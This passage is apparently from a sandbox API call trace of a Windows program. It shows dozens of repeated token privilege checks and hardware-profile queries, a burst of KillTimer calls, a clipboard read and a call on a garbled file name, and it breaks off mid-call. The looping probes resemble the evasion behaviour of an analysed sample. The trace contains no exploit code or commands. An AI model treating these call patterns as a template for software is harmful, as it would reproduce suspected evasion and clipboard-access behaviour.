pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.154] GetLastError () returned 0x578 [0085.154] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.154] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.154] GetCurrentThread () returned 0xfffffffe [0085.154] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.154] GetLastError () returned 0x3f0 [0085.154] GetCurrentProcess () returned 0xffffffff [0085.154] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.154] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.154] SetLastError (dwErrCode=0x522) [0085.155] CloseHandle (hObject=0x114) returned 1 [0085.155] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.155] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.155] GetLastError () returned 0x578 [0085.155] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.155] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.155] GetCurrentThread () returned 0xfffffffe [0085.155] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.155] GetLastError () returned 0x3f0 [0085.155] GetCurrentProcess () returned 0xffffffff [0085.155] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.155] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.155] SetLastError (dwErrCode=0x522) [0085.155] CloseHandle (hObject=0x114) returned 1 [0085.155] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.155] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.155] GetLastError () returned 0x578 [0085.155] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.155] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.155] GetCurrentThread () returned 0xfffffffe [0085.155] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.155] GetLastError () returned 0x3f0 [0085.155] GetCurrentProcess () returned 0xffffffff [0085.155] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.155] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.155] SetLastError (dwErrCode=0x522) [0085.155] CloseHandle (hObject=0x114) returned 1 [0085.155] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.155] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.155] GetLastError () returned 0x578 [0085.155] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.155] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.155] GetCurrentThread () returned 0xfffffffe [0085.155] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.155] GetLastError () returned 0x3f0 [0085.155] GetCurrentProcess () returned 0xffffffff [0085.155] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.155] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.155] SetLastError (dwErrCode=0x522) [0085.155] CloseHandle (hObject=0x114) returned 1 [0085.155] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.155] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.155] GetLastError () returned 0x578 [0085.155] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.155] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.155] GetCurrentThread () returned 0xfffffffe [0085.155] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.155] GetLastError () returned 0x3f0 [0085.155] GetCurrentProcess () returned 0xffffffff [0085.155] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.155] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.156] SetLastError (dwErrCode=0x522) [0085.156] CloseHandle (hObject=0x114) returned 1 [0085.156] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.156] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.156] GetLastError () returned 0x578 [0085.156] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.156] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.156] GetCurrentThread () returned 0xfffffffe [0085.156] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.156] GetLastError () returned 0x3f0 [0085.156] GetCurrentProcess () returned 0xffffffff [0085.156] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.156] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.156] SetLastError (dwErrCode=0x522) [0085.156] CloseHandle (hObject=0x114) returned 1 [0085.156] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.156] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.156] GetLastError () returned 0x578 [0085.156] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.156] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.156] GetCurrentThread () returned 0xfffffffe [0085.156] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.156] GetLastError () returned 0x3f0 [0085.156] GetCurrentProcess () returned 0xffffffff [0085.156] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.156] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.156] SetLastError (dwErrCode=0x522) [0085.156] CloseHandle (hObject=0x114) returned 1 [0085.156] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.156] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.156] GetLastError () returned 0x578 [0085.156] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.156] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.156] GetCurrentThread () returned 0xfffffffe [0085.156] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.156] GetLastError () returned 0x3f0 [0085.156] GetCurrentProcess () returned 0xffffffff [0085.156] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.156] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.156] SetLastError (dwErrCode=0x522) [0085.156] CloseHandle (hObject=0x114) returned 1 [0085.156] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.156] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.156] GetLastError () returned 0x578 [0085.156] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.156] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.156] GetCurrentThread () returned 0xfffffffe [0085.156] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.156] GetLastError () returned 0x3f0 [0085.156] GetCurrentProcess () returned 0xffffffff [0085.156] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.157] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.157] SetLastError (dwErrCode=0x522) [0085.157] CloseHandle (hObject=0x114) returned 1 [0085.157] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.157] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.157] GetLastError () returned 0x578 [0085.157] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.157] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.157] GetCurrentThread () returned 0xfffffffe [0085.157] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.157] GetLastError () returned 0x3f0 [0085.157] GetCurrentProcess () returned 0xffffffff [0085.157] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.157] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.157] SetLastError (dwErrCode=0x522) [0085.157] CloseHandle (hObject=0x114) returned 1 [0085.157] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.157] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.157] GetLastError () returned 0x578 [0085.157] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.157] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.157] GetCurrentThread () returned 0xfffffffe [0085.157] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.157] GetLastError () returned 0x3f0 [0085.157] GetCurrentProcess () returned 0xffffffff [0085.157] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.157] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.157] SetLastError (dwErrCode=0x522) [0085.157] CloseHandle (hObject=0x114) returned 1 [0085.157] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.157] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.157] GetLastError () returned 0x578 [0085.157] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.157] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.157] GetCurrentThread () returned 0xfffffffe [0085.157] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.157] GetLastError () returned 0x3f0 [0085.157] GetCurrentProcess () returned 0xffffffff [0085.157] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.157] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.157] SetLastError (dwErrCode=0x522) [0085.157] CloseHandle (hObject=0x114) returned 1 [0085.157] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.157] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.157] GetLastError () returned 0x578 [0085.157] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.157] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.157] GetCurrentThread () returned 0xfffffffe [0085.157] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.158] GetLastError () returned 0x3f0 [0085.158] GetCurrentProcess () returned 0xffffffff [0085.158] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.158] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.158] SetLastError (dwErrCode=0x522) [0085.158] CloseHandle (hObject=0x114) returned 1 [0085.158] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.158] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.158] GetLastError () returned 0x578 [0085.158] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.158] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.158] GetCurrentThread () returned 0xfffffffe [0085.158] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.158] GetLastError () returned 0x3f0 [0085.158] GetCurrentProcess () returned 0xffffffff [0085.158] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.158] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.158] SetLastError (dwErrCode=0x522) [0085.158] CloseHandle (hObject=0x114) returned 1 [0085.158] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.158] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.158] GetLastError () returned 0x578 [0085.158] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.158] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.158] GetCurrentThread () returned 0xfffffffe [0085.158] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.158] GetLastError () returned 0x3f0 [0085.158] GetCurrentProcess () returned 0xffffffff [0085.158] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.158] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.158] SetLastError (dwErrCode=0x522) [0085.158] CloseHandle (hObject=0x114) returned 1 [0085.158] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.158] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.158] GetLastError () returned 0x578 [0085.158] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.158] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.158] GetCurrentThread () returned 0xfffffffe [0085.158] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.158] GetLastError () returned 0x3f0 [0085.158] GetCurrentProcess () returned 0xffffffff [0085.158] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.158] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.158] SetLastError (dwErrCode=0x522) [0085.158] CloseHandle (hObject=0x114) returned 1 [0085.158] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.158] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.158] GetLastError () returned 0x578 [0085.158] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.158] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.159] GetCurrentThread () returned 0xfffffffe [0085.159] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.159] GetLastError () returned 0x3f0 [0085.159] GetCurrentProcess () returned 0xffffffff [0085.159] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.251] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.251] SetLastError (dwErrCode=0x522) [0085.251] CloseHandle (hObject=0x114) returned 1 [0085.251] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.251] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.251] GetLastError () returned 0x578 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.287] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.288] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.288] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.288] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.288] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.288] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.288] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.288] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.288] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.288] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.288] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.288] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.288] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.288] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.288] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.288] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.288] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.288] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.288] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.288] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.288] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.288] GetForegroundWindow () returned 0x1005e [0085.288] GetWindowLongA (hWnd=0x1005e, nIndex=-4) returned 0 [0085.288] SetActiveWindow (hWnd=0x1005e) returned 0x0 [0085.288] SetWindowLongA (hWnd=0x1005e, nIndex=-4, dwNewLong=0) returned 0 [0085.288] OleInitialize (pvReserved=0x0) returned 0x0 [0085.292] OleGetClipboard (in: ppDataObj=0x18f494 | out: ppDataObj=0x18f494*=0x30e430) returned 0x0 [0085.292] CoInitialize (pvReserved=0x0) returned 0x1 [0085.292] CoCreateInstance (in: rclsid=0x18fae0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), pUnkOuter=0x0, dwClsContext=0x4, riid=0x5583b740*(Data1=0x112, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18fe0c | out: ppv=0x18fe0c*=0x0) returned 0x80040154 [0085.891] StrDupA (lpSrch="buffer text") returned="buffer text" [0085.892] LocalFree (hMem=0x321960) returned 0x0 [0085.892] FormatMessageA (in: dwFlags=0x1000, lpSource=0x0, dwMessageId=0x80040154, dwLanguageId=0x800, lpBuffer=0x18c624, nSize=0x78, Arguments=0x0 | out: lpBuffer="Class not registered\r\n") returned 0x16 [0086.439] OutputDebugStringA (lpOutputString="Class not registered\r\n") [0086.736] GetDC (hWnd=0x0) returned 0x1401007f [0086.736] CreateCompatibleDC (hdc=0x1401007f) returned 0x6010269 [0086.736] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eecc | out: piconinfo=0x18eecc) returned 0 [0086.736] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0086.736] GetCurrentDirectoryW (in: 